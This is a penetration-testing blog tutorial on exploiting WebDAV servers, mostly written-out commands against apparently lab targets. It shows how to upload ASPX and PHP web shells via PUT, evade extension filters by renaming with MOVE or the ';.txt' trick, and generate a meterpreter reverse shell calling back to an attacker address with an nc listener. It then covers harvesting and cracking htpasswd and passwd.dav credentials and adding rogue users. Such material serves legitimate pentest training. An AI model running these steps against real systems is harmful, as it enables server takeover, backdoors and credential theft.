Exploiting WebDAV

by Vry4n_ | Sep 17, 2021 | Web Exploitation

WebDAV stands for “Web-based Distributed Authoring and Versioning”. It is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.

The basic functionality of WebDAV includes enabling users to share, copy, move and edit files through a web server. It can also be used to support collaborative applications with features like file locking and revision tracking.

A HTTP Server with WebDav active is a server where you probably can update, delete, move, copy files. Sometimes you need to have valid credentials (usually check with HTTP Basic Authentication).

You should try to upload some webshell and execute it from the web server to take control over the server.

Other common configuration is to forbid uploading files with extensions that will be executed by the web server, you should check how to bypass this:

• Upload files with executable extensions (maybe it’s not forbidden).
• Upload files without executable extensions (like .txt) and try to rename the file (move) with an executable extension.
• Upload files without executable extensions (like .txt) and try to copy the file (move) with executable extension.
• (OPTIONAL) you can bypass by adding at the end of the name “;.txt” and the file will be executed as if it were a .asp file (you could also use “.html” instead of “.txt” but DON’T forget the “;”, Then you can upload your shell as a “.txt” file and copy/move it to a “.asp;.txt” file.

WebDAV Features and Use

WebDAV extends HTTP headers for communication with a server. The new headers include:

• COPY, copy a resource
• MOVE, move a resource
• MKCOL, create a collection, for example, a folder
• PROPFIND, retrieve properties stored as XML
• PROPPATCH, change and/or remove properties
• LOCK, put a lock on a resource
• UNLOCK, remove a lock from a resource

Identify

Metasploit

1. Identify whether WebDAV is running using Metasploit. The scanner will return some HTTP information, including the Apache version number and whether WebDAV is enabled or not.

• use auxiliary/scanner/http/webdav_scanner
• show options
• set RHOST 10.10.10.15
• run

DAVtest

DAVTest tool tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

DAVTest supports:

• Automatically send exploit files
• Automatic randomization of directory to help hide files
• Send text files and try MOVE to executable name
• Basic and Digest authorization
• Automatic clean-up of uploaded files
• Send an arbitrary file

This program attempts to exploit WebDAV enabled servers by:

• attempting to create a new directory (MKCOL)
• attempting to put test files of various programming langauges (PUT)
• optionally attempt to put files with .txt extension, then move to executable (MOVE)
• optionally attempt to put files with .txt extension, then copy to executable (COPY)
• check if files executed or were uploaded properly
• optionally upload a backdoor/shell file for languages which execute
• Additionally, this can be used to put an arbitrary file to remote systems.

https://github.com/cldrn/davtest

1. Run the tool help to see its options

• davtest –help

2. Test File Permissions with DAVTest, all we need to do is provide it with a valid URL pointing to an instance of WebDAV. Naturally, use the -url switch followed by the correct URL. It begins by testing the connection and attempts to create a test directory, which we see is a success. Next, DAVTest will send a variety of different types of files to determine what can be uploaded.

• davtest -url http://10.10.10.15

NOTE: testing for file execution. We can see there the ones that could execute .txt and .html only

• 3. Now we can check some of the files that we uploaded using PUT
• http://10.10.10.15/DavTestDir_jinj8h/davtest_jinj8h.txt

Manual DAV test

1. Create a .txt file

• echo “Welcome to Vk9 Security” > file.txt
• curl -i -s -k -X PUT http://10.10.10.15/davtest.txt -d @file.txt
• curl -i -s -k -X GET http://10.10.10.15/davtest.txt

2. We can also visit it from the browser

• http://10.10.10.15/davtest.txt

Nikto

1. Scan the website using nikto, you may find info there

• nikto -h 10.10.10.15

Nmap

• nmap -T4 -p80 –script=http-iis-webdav-vuln 10.10.10.15

Exploitation

1. Exploitation (BurpSuite)

1. We can inspect what DAVtest is doing by redirecting traffic to BurpSuite or any other web proxy. First configure the proxy to redirect traffic from the remote host to the local address

• Bind port 80 and loopback only, in binding tab

• Redirect traffic from remote host, in request handling tab

2. Make sure the listener has been created

3. If you run DAVtest to localhost, you will receive the requests into BurpSuite

• davtest -url http://localhost

4. Forwarding all the requests and then looking at the HTTP history you can inspect the activity

5. We can now create our own file using one of those PUT requests and sending it to repeater, send to repeater

6. Edit the content, and send the crafted request, in this case we got a “201 Created” response back from the server.

7. Now, if we go to the browser and visit http://10.10.10.15/vk9-sec.html we should see our crafted message

• http://10.10.10.15/vk9-sec.html

Note. Tipically, we just need to upload a reverse shell file that the server would be able to interpret.

8. First create a reverse shell, I will choose ASPX as the previous curl output indicates “X-Powered-By: ASP.NET”

• msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=9999 -f aspx

9. Start a listener, in this case I will use Metasploit

• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST 10.10.14.3
• set LPORT 9999
• run

10. Send the reverse shell code created with MSFVenom via BurpSuite repeater, as we have been doing. In this particular case we are getting “403 Forbidden”. Which means this file type is not allowed.

11. I will try to change the file name as reverse.html, as it accepted .txt and .html, it worked “201 Created” is the server response.

12. If I try to execute it, it wont work as the .html doesn’t execute .aspx

13. Looking at the other HTTP methods there is one named MOVE, we can try to rename reverse.html to reverse.aspx

• curl -i -s -k -X ‘OPTIONS’ ‘http://10.10.10.15’

Use move to change the file name

EXAMPLE

Request

• MOVE /reverse.html HTTP/1.1
• Destination: reverse.aspx

Response

• HTTP/1.1 201 Created
• Location: http://www.contoso.com/pub2/folder2/

https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142926(v=exchg.65)

14. Now using the same request we uploaded reverse.html, we will change the file extension to .aspx

15. Visiting the reverse.aspx file via browser show now execute our shell, we should see a white screen not a 404 page

• http://10.10.10.15/reverse.aspx

16. Looking at the meterpreter session we can now see the incoming connection

• sysinfo

2. Exploitation (Curl)

1. We will now do the same thing but using Curl. This time I will upload a webshell (cmdasp.aspx)

• cd /usr/share/webshells/aspx/
• curl -i -s -k -X PUT http://10.10.10.15/webshell.txt -d @cmdasp.aspx

Note: We got a “201 Created” response from the server which means it was uploaded.

2. Now visiting the file we uploaded we see plain text as only .txt and .html were allowed in this scenario.

• http://10.10.10.15/webshell.txt

3. Using Curl we can rename the file, to change the extension

• curl -i -s -k -X MOVE -H ‘Destination:http://10.10.10.15/webshell.aspx’ http://10.10.10.15/webshell.txt

4. As we got a 201 response, now we visit the new file

• http://10.10.10.15/webshell.aspx

5. We can now, run commands

• whoami

3. Exploitation (Cadaver)

cadaver is a command-line WebDAV client, with support for file upload, download, on-screen display, in place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking.

https://github.com/grimneko/cadaver

1. Display the tool help commands

• cadaver –help

2. Display tool version

• cadaver –version

3. connect to a vulnerable WebDAV host

• cadaver http://10.10.10.15
• help
• <TAB><TAB>

4. Being there you can run limited system commands, example:

• pwd
• ls
• cat file.txt

5. You delete files using DELETE method

• delete file.txt

6. Download file from the server using GET method

• get reverse.aspx
• lls

7. You can upload new files, we will upload a webshell again, first as .txt, then move it to .aspx, as .aspx was forbidden by the server

• lcd
• lls
• put cmdasp.aspx
• put cmdasp.aspx cmdasp.txt

8. Change the file extension from .txt to .aspx

• move cmdasp.txt cmdasp.aspx

9. Now you can visit the website using the browser, and find cmdasp.aspx

• http://10.10.10.15/cmdasp.aspx

Note: You can upload reverse shells or any function you need.

10. You can also forward the requests from cadaver to a proxy, I will use BurpSuite for this, so, you can inspect what the application is sending and doing, also craft those requests as you need.

• cadaver -p 127.0.0.1:8080 http://10.10.10.15

4. Exploitation (Cadaver)(authenticated)

1. Having already credentials we could try the previous technique (administrant:sleepless)

• cadaver http://muddy.ugc/webdav
• username: administrant
• password: sleepless

2. Having access we can upload our own Shell, I will use php-reverse-shell.php, edit the $ip & $port variables to match your listener

• find / -name php-reverse-shell.php 2> /dev/null
• cp /usr/share/webshells/php/php-reverse-shell.php .
• vi php-reverse-shell.php

3. Start a listener in your machine

• nc -lvp 5555

4. Now, upload the listener to the remote server, using cadaver

• ls
• put php-reverse-shell.php
• ls

5. Now execute the script, either by browser or using curl. For this demonstration I will execute it using curl

• curl http://muddy.ugc/webdav/php-reverse-shell.php -u administrant:sleepless

6. Check on your reverse shell, there should be a new session opened

• whoami

Extra (Post credentials)

1. If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:

• /etc/apache2/sites-enabled/000-default

Inside it you could find something like:

2. Inside this type of files (AuthUserFile) you will find the username and a hash of the password. These are the credentials the webdav server is using to authenticate users.

3. You can try to crack them, or to add more if for some reason you want to access the webdav server

• htpasswd /etc/apache2/users.password <USERNAME>

4. To check if the new credentials are working you can do:

• wget –user <USERNAME> –ask-password http://domain/path/to/webdav/ -O – -q

Extra 2 (Post credentials)

1. We can also get credentials from /var/www/html/webdav/passwd.dav , In this particular scenario I was able to read this file using LFI technique

• /var/www/html/webdav/passwd.dav

2. We can crack it using john the reaper, first create a file with the credentials to crack

• vi creds.txt
• cat creds.txt

3. Now, use john against this credential file

• john creds.txt –wordlist=/usr/share/wordlists/rockyou.txt